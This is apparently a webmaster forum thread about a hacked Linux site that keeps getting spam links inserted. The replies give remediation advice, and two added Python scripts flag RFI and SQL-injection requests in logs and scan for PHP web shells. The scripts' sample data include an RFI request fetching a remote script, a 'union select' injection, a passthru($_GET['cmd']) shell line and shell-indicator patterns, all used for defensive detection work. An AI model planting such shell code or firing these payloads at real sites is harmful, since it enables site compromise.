Hello Knowledgeable DP Users, My website, which currently resides on a Linux server, is being attacked by a hacker who is repeatedly placing large blocks of spam hyperlinks in the markup. At first I had the CHMOD permissions wide open, and I changed them to owner modifications only, and assumed this would do the trick, but I discovered today that the hacker is doing the modifications in some other way. I am wondering, do they have my FTP password? Is there any way of knowing this or how they got it? Is there any way of determining how they are modifying my pages, or any logs or records of FTP transfers or other accesses to my account? This problem seriously worries me because I am not a security expert, I'm unsure it can be solved, and it will be hard to find a person who cares as much about this site as I do... I would not have ever even seen the blocks of links had I not examined the HTML a few weeks ago and initially recognized the modifications. Would appreciate someone's help or professional advice!
First and foremost, remove any trace of spam left by the spammer. I assume many of your webpages must be full of spam. Do a search for the infected pages and remove the pages from Google (if necessary). Once you have cleaned the pages, consider a reinclusion request through Webmaster Tools.
First of all, you shouldn't have the same root password for all your sites. Example: for root login, password = asdfg AND the individual sites' passwords are also asdfg. If a hacker gets hold of a password, he can access any site since it's the root password.
- To prevent this: change the root password and the individual passwords (note them down in Notepad) and use the encrypt or password generator provided to you (as with WHM/cPanel, you can generate a password like ddj)8^%).
Next: are your site scripts up to date and still supported by their creator? As in updates, fixes, security packages? (2 incidents for me: once the site was exploited and hacked into because I had not updated the script to the latest one, and the other due to an old script no longer being supported.)
If emails are sent and spammed through your server, follow my info posted here: http://forums.digitalpoint.com/showthread.php?t=1163669
You could also ask your host's support to identify the IP of the abuser for you and block the IP. If the problem still persists, follow the above guides/steps.
Are any of you guys hosting with DreamHost? They had all their cPanel/FTP passwords cracked months ago. Yeah, I'd do the above and look out for any directories you don't recognise (rename them to be on the safe side). Also update your software to the latest versions, especially if you are using WordPress. I'd also do Google and Yahoo searches for site:yoursite.com +spamwords to see if there are any clues in there.
Are you using WordPress? If you have WordPress installed, make sure it is always up to date and change all admin passwords.
Without more information such as the name of the site, the first suspect is some sort of Remote File Inclusion (RFI) attack that exploited a hole in one of your scripts to run an external script that did the actual insertions of the text into your pages. If someone can trick your script into running an external PHP script, they have write access to your site and can do anything they want. Determine whether the links are actually in the markup... if some of your content comes from a database, they could have done an SQL injection attack that would put the offending text into your database. It's possible they got your FTP login info, but that's less common than these other things. As has already been said, make sure all your scripts are up to date. You can also do a search for vulnerability advisories on each of your scripts at http://secunia.com/advisories/search/. If these attacks are RFI or SQL injection, they will show in your site access logs, but you have to know what to look for. For starters, get a timestamp from a hacked file, and search your logs for accesses that were happening at that moment.
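The log-correlation step described in the post above (take the modified file's timestamp, then look at who was hitting the site at that moment and for what), written out as an added example. This is not code from the thread; it assumes Apache "combined" log format and that the server clock and the log timezone agree. The log lines and the file mtime are constructed for illustration.

```python
"""
Correlate a defaced file's mtime with access-log entries and flag the
request shapes the post mentions: RFI (a query parameter whose value is a
remote URL) and SQL injection (UNION SELECT, OR 1=1, trailing --, etc.).
Added example; the sample log and timestamp below are constructed.
"""
import os
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
RFI_SCHEMES = ("http://", "https://", "ftp://")
SQLI_RE = re.compile(
    r"(union\s+select|or\s+1\s*=\s*1|sleep\s*\(|information_schema|--\s*$|'\s*or\s*')", re.I
)


def classify(path):
    """Tag a request path: 'rfi' and/or 'sqli' based on its query values."""
    tags = set()
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        v = value.strip().lower()          # parse_qsl already URL-decodes
        if v.startswith(RFI_SCHEMES):
            tags.add("rfi")
        if SQLI_RE.search(v):
            tags.add("sqli")
    return sorted(tags)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it doesn't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["tags"] = classify(rec["path"])
    return rec


def file_mtime(path):
    """Timezone-aware mtime of a real file on disk (what you'd feed in for real)."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def hits_around(lines, mtime, window=timedelta(minutes=5)):
    """Requests within +/- window of mtime; tagged (suspicious) ones sort first."""
    out = [r for r in map(parse_line, lines) if r and abs(r["time"] - mtime) <= window]
    out.sort(key=lambda r: (not r["tags"], r["time"]))
    return out


# Constructed sample: one RFI attempt, one SQLi attempt, one normal hit inside the
# window, and one unrelated hit hours earlier. IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2008:13:55:36 +0000] "GET /index.php?page=http://198.51.100.9/c.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Oct/2008:13:55:40 +0000] "GET /style.css HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2008:13:56:02 +0000] "GET /news.php?id=1%20union%20select%201,2,3-- HTTP/1.1" 200 900 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Oct/2008:11:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""
SAMPLE_MTIME = datetime(2008, 10, 10, 13, 55, 50, tzinfo=timezone.utc)  # constructed


def demo():
    """Run the correlation over the constructed sample; returns the hit list."""
    return hits_around(SAMPLE_LOG.splitlines(), SAMPLE_MTIME)


if __name__ == "__main__":
    for r in demo():
        print(r["time"].isoformat(), r["ip"], r["tags"] or "-", r["path"])
```

For a real incident, replace SAMPLE_LOG with the lines of your access_log and SAMPLE_MTIME with file_mtime("path/to/defaced.html"); the first few rows of the output are the requests worth reading carefully. A match here is a lead, not proof: the window should be widened if the file was rewritten by a cron job or a cached script rather than directly by the request.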
Just scan your website with the ClamAV free antivirus tool for cPanel, and change your FTP and cPanel account passwords. Also check your FTP connections: is there any other FTP connection which you never created? If you find any illegal account, just delete it. And use a CAPTCHA where spammers post bad links. You can also use iptables to block the user.
Sounds like you may need a web server firewall. I host my website on Windows with IIS, so I use AQTRONIX WebKnight (an open source IIS firewall), which does a great job. I am not sure what the best one is for Linux/Apache, but I did a Google search for Apache firewall and here are some results I came up with:
http://www.modsecurity.org/
http://www.binarysec.com/
Securing Apache 2: Step-by-Step Guide http://www.securityfocus.com/infocus/1786/
PHP Firewall http://firewallscript.com/
A web server firewall will most likely help you easily block this spammer and prevent/detect any future exploits.
I've got money on an unsecure script that they have penetrated and added a PHP shell like c99shell.php to your server. From there they can do whatever they want.
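Two of the replies above (look for directories you don't recognise; expect a c99shell-style PHP shell dropped on the server) come down to the same scan of the web root, so here is one added example covering both. It is not code from the thread. It assumes you can list the directories you created yourself and roughly when you last touched the site; the indicator strings are a starting set of common web-shell markers, not a complete signature list, and the sample tree built by build_sample_tree() is constructed for illustration.

```python
"""
Scan a web root for (1) top-level directories not in your known-good list,
(2) files modified after a baseline timestamp, and (3) files carrying
common PHP web-shell indicators. Added example; sample tree is constructed.
"""
import os
import re
import tempfile
from pathlib import Path

# Markers commonly found in PHP web shells (c99/r57 family, encoded eval
# loaders, and command execution fed straight from request parameters).
SHELL_INDICATORS = [
    re.compile(p, re.I) for p in (
        r"c99shell",
        r"r57shell",
        r"FilesMan",
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
        r"(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)",
        r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]",   # /e modifier = eval
    )
]
SCAN_SUFFIXES = (".php", ".phtml", ".php5", ".inc", ".txt")  # .txt: RFI payloads


def scan_file(path):
    """Return the indicator patterns found in one file (empty list if clean)."""
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return []
    return [rx.pattern for rx in SHELL_INDICATORS if rx.search(text)]


def scan_tree(root, known_dirs, modified_after):
    """
    root:           web root to walk
    known_dirs:     set of top-level directory names you created yourself
    modified_after: unix timestamp; files newer than this are reported
    Returns {'unknown_dirs': [...], 'recent': [...], 'shells': {path: [hits]}}.
    """
    root = Path(root)
    findings = {"unknown_dirs": [], "recent": [], "shells": {}}
    for d in sorted(p for p in root.iterdir() if p.is_dir()):
        if d.name not in known_dirs:
            findings["unknown_dirs"].append(d.name)
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if p.stat().st_mtime > modified_after:
            findings["recent"].append(rel)
        if p.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_file(p)
            if hits:
                findings["shells"][rel] = hits
    return findings


def build_sample_tree():
    """Constructed web root in a temp dir: two clean files, one dropped shell,
    one encoded loader in a directory the owner never created. Returns (root, baseline)."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    baseline = 1_200_000_000  # arbitrary "last time I edited the site" timestamp
    files = {
        "index.php": ("<?php include 'includes/config.php'; echo 'hello'; ?>", baseline - 86400),
        "includes/config.php": ("<?php $db = 'localhost'; ?>", baseline - 86400),
        "images/x.php": ("<?php /* c99shell v1.0 */ passthru($_GET['cmd']); ?>", baseline + 3600),
        "cache_old/up.txt": ('<?php eval(base64_decode("ZWNobyAxOw==")); ?>', baseline + 7200),
    }
    for rel, (content, mtime) in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
        os.utime(p, (mtime, mtime))
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_sample_tree()
    result = scan_tree(root, known_dirs={"images", "includes"}, modified_after=baseline)
    for key, val in result.items():
        print(key, val)
```

Run it against the real site as scan_tree("/home/you/public_html", {"images", "includes", ...}, <timestamp>). Treat the "recent" list as the primary lead and the indicator hits as confirmation: an attacker who has shell access can reset mtimes with touch, and an obfuscated shell will not contain any of these strings, so an empty "shells" dict does not mean the server is clean.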